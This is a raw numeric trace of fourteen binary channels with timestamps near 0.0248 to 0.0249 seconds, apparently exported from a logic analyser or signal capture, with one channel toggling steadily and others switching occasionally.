0,0,1,1,0,0,0,0,0,0,0,0,0,1,2.4799524e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,2.4799540e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,2.4799552e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,2.4799576e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,2.4799604e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,2.4799628e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,2.4799652e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,2.4799676e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,2.4799700e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,2.4799724e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,2.4799752e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,2.4799776e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,2.4799828e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,2.4799852e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,2.4799876e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,2.4799900e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,2.4799924e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,2.4799952e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,2.4799976e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,2.4800004e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,2.4800028e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,2.4800052e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,2.4800076e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,2.4800100e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,2.4800124e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,2.4800148e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,2.4800172e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,2.4800204e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,2.4800224e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,2.4800248e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,2.4800276e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,2.4800300e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,2.4800324e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,2.4800348e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,2.4800404e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,2.4800424e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,2.4800452e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,2.4800476e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,2.4800500e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,2.4800524e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,2.4800548e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,2.4800572e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,2.4800596e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,2.4800624e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,2.4800648e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,2.4800676e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,2.4800700e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,2.4800724e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,2.4800748e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,2.4800772e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,2.4800796e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,2.4800824e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,2.4800848e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,2.4800876e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,2.4800900e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,2.4800924e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,2.4800948e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,2.4800972e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,2.4800996e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,2.4801024e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,2.4801048e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,2.4801076e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,2.4801124e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,2.4801148e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,2.4801200e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,2.4801224e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,2.4801276e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,2.4801300e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,2.4801348e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,2.4801372e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,2.4801424e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,2.4801452e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,2.4801500e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,2.4801524e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,2.4801548e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,2.4801572e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,2.4801596e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,2.4801624e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,2.4801652e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,2.4801676e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,2.4801700e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,2.4801724e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,2.4801748e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,2.4801772e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,2.4801796e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,2.4801824e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,2.4801848e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,2.4801876e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,2.4801900e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,2.4801924e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,2.4801948e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,2.4801972e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,2.4801996e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,2.4802024e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,2.4802048e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,2.4802076e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,2.4802100e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,2.4802124e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,2.4802148e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,2.4802172e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,2.4802196e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,2.4802224e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,2.4802248e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,2.4802276e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,2.4802300e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,2.4802324e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,2.4802348e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,2.4802372e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,2.4802396e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,2.4802424e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,2.4802476e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,2.4802500e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,2.4802524e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,2.4802548e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,2.4802572e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,2.4802596e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,2.4802624e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,2.4802648e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,2.4802676e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,2.4802700e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,2.4802724e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,2.4802748e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,2.4802772e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,2.4802796e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,2.4802824e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,2.4802848e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,2.4802876e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,2.4802900e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,2.4802924e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,2.4802948e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,2.4802972e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,2.4802996e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,2.4803024e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,2.4803048e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,2.4803076e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,2.4803100e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,2.4803124e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,2.4803148e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,2.4803172e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,2.4803196e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,2.4803224e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,2.4803248e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,2.4803276e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,2.4803300e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,2.4803324e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,2.4803348e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,2.4803372e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,2.4803396e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,2.4803424e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,2.4803448e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,2.4803476e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,2.4803500e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,2.4803524e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,2.4803548e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,2.4803572e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,2.4803596e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,2.4803624e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,2.4803648e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,2.4803676e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,2.4803700e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,2.4803724e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,2.4803748e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,2.4803772e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,2.4803796e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,2.4803824e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,2.4803848e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,2.4803876e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,2.4803900e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,2.4803924e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,2.4803948e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,2.4803972e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,2.4803996e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,2.4804024e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,2.4804048e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,2.4804076e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,2.4804100e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,2.4804124e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,2.4804148e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,2.4804172e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,2.4804196e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,2.4804224e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,2.4804248e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,2.4804276e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,2.4804300e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,2.4804324e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,2.4804348e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,2.4804372e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,2.4804396e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,2.4804424e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,2.4804448e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,2.4804476e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,2.4804500e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,2.4804524e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,2.4804548e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,2.4804572e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,2.4804596e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,2.4804624e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,2.4804648e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,2.4804676e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,2.4804700e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,2.4804724e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,2.4804748e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,2.4804772e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,2.4804796e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,2.4804824e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,2.4804848e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,2.4804876e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,2.4804900e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,2.4804924e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,2.4804948e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,2.4804972e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,2.4804996e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,2.4805020e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,2.4805044e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,2.4805072e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,2.4805100e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,2.4805124e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,2.4805148e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,2.4805172e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,2.4805196e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,2.4805220e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,2.4805244e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,2.4805272e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,2.4805300e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,2.4805324e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,2.4805348e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,2.4805372e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,2.4805396e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,2.4805420e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,2.4805444e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,2.4805476e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,2.4805500e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,2.4805524e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,2.4805548e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,2.4805572e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,2.4805596e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,2.4805624e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,2.4805644e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,2.4805676e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,2.4805700e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,2.4805724e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,2.4805748e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,2.4805772e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,2.4805796e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,2.4805824e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,2.4805844e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,2.4805876e-02 0,0,1,1,0,0,0,0,0,1,0,0,0,0,2.4805900e-02 0,0,1,1,0,1,0,0,0,1,0,0,0,0,2.4805904e-02 0,0,1,1,0,1,0,0,0,1,0,0,0,1,2.4930612e-02 1,0,1,1,0,1,0,0,0,1,0,0,0,1,2.4930828e-02 1,0,1,1,0,1,0,0,0,1,0,1,0,1,2.4930844e-02 1,0,1,1,0,1,0,0,0,1,0,0,0,1,2.4930868e-02 1,0,1,1,0,1,0,0,0,1,0,0,1,1,2.4931172e-02 1,0,1,1,0,1,0,0,0,1,0,0,0,1,2.4931200e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,1,2.4931204e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,1,2.4931224e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,1,2.4931252e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,1,2.4931276e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,1,2.4931300e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,1,2.4931324e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,1,2.4931352e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,1,2.4931372e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,1,2.4931400e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,1,2.4931428e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,0,2.4931444e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,0,2.4931452e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,0,2.4931476e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,0,2.4931500e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,0,2.4931524e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,0,2.4931552e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,0,2.4931576e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,0,2.4931600e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,0,2.4931652e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,0,2.4931676e-02 1,0,1,1,0,1,0,0,0,1,0,0,0,0,2.4931684e-02 1,0,1,1,0,1,0,0,0,1,0,0,1,0,2.4931728e-02 1,0,1,1,0,1,0,0,0,1,0,0,0,0,2.4931752e-02 1,0,1,1,0,1,0,0,0,0,0,0,0,0,2.4931756e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,0,2.4931760e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,0,2.4931776e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,0,2.4931804e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,0,2.4931828e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,0,2.4931852e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,0,2.4931876e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,0,2.4931900e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,0,2.4931924e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,0,2.4931948e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,0,2.4931972e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,0,2.4932000e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,0,2.4932024e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,0,2.4932052e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,0,2.4932076e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,0,2.4932100e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,0,2.4932124e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,0,2.4932148e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,0,2.4932172e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,0,2.4932200e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,0,2.4932224e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,0,2.4932248e-02 1,0,1,1,0,1,0,0,0,1,0,0,0,0,2.4932252e-02 1,0,1,1,0,1,0,0,0,1,0,0,1,0,2.4932300e-02 1,0,1,1,0,1,0,0,0,1,0,0,0,0,2.4932324e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,0,2.4932332e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,0,2.4932348e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,0,2.4932372e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,0,2.4932400e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,0,2.4932424e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,0,2.4932452e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,0,2.4932476e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,0,2.4932500e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,0,2.4932524e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,0,2.4932548e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,0,2.4932572e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,0,2.4932600e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,0,2.4932624e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,0,2.4932652e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,0,2.4932676e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,0,2.4932724e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,0,2.4932748e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,0,2.4932772e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,0,2.4932800e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,0,2.4932824e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,0,2.4932848e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,0,2.4932876e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,0,2.4932900e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,0,2.4932924e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,0,2.4932948e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,0,2.4932972e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,0,2.4932996e-02 1,0,1,1,0,1,0,0,0,1,0,0,0,0,2.4933004e-02 1,0,1,1,0,1,0,0,0,1,0,0,1,0,2.4933024e-02 1,0,1,1,0,1,0,0,0,1,0,0,0,0,2.4933052e-02 1,0,1,1,0,1,0,0,0,1,0,0,1,0,2.4933076e-02 1,0,1,1,0,1,0,0,0,1,0,0,0,0,2.4933100e-02 1,0,1,1,0,1,0,0,0,1,0,0,1,0,2.4933124e-02 1,0,1,1,0,1,0,0,0,1,0,0,0,0,2.4933148e-02 1,0,1,1,0,1,0,0,0,1,0,0,1,0,2.4933172e-02 1,0,1,1,0,1,0,0,0,1,0,0,0,0,2.4933200e-02 1,0,1,1,0,1,0,0,0,1,0,0,1,0,2.4933224e-02 1,0,1,1,0,1,0,0,0,1,0,0,0,0,2.4933252e-02 1,0,1,1,0,1,0,0,0,1,0,0,1,0,2.4933300e-02 1,0,1,1,0,1,0,0,0,1,0,0,0,0,2.4933324e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,0,2.4933332e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,0,2.4933348e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,0,2.4933372e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,0,2.4933400e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,0,2.4933424e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,0,2.4933452e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,0,2.4933476e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,0,2.4933500e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,0,2.4933524e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,0,2.4933548e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,0,2.4933572e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,0,2.4933600e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,0,2.4933624e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,0,2.4933652e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,0,2.4933676e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,0,2.4933700e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,0,2.4933724e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,0,2.4933748e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,0,2.4933772e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,0,2.4933800e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,0,2.4933824e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,0,2.4933852e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,0,2.4933876e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,0,2.4933900e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,0,2.4933924e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,0,2.4933948e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,0,2.4933972e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,0,2.4934000e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,0,2.4934024e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,0,2.4934052e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,0,2.4934076e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,0,2.4934100e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,0,2.4934124e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,0,2.4934148e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,0,2.4934172e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,0,2.4934224e-02 1,0,1,1,0,1,0,0,0,1,0,0,0,0,2.4934252e-02 1,0,1,1,0,1,0,0,0,1,0,0,1,0,2.4934300e-02 1,0,1,1,0,1,0,0,0,1,0,0,0,0,2.4934324e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,0,2.4934332e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,0,2.4934348e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,0,2.4934372e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,0,2.4934396e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,0,2.4934424e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,0,2.4934452e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,0,2.4934472e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,0,2.4934496e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,0,2.4934524e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,0,2.4934548e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,0,2.4934572e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,0,2.4934596e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,0,2.4934620e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,0,2.4934648e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,0,2.4934672e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,0,2.4934696e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,0,2.4934724e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,0,2.4934748e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,0,2.4934772e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,0,2.4934796e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,0,2.4934820e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,0,2.4934848e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,0,2.4934872e-02 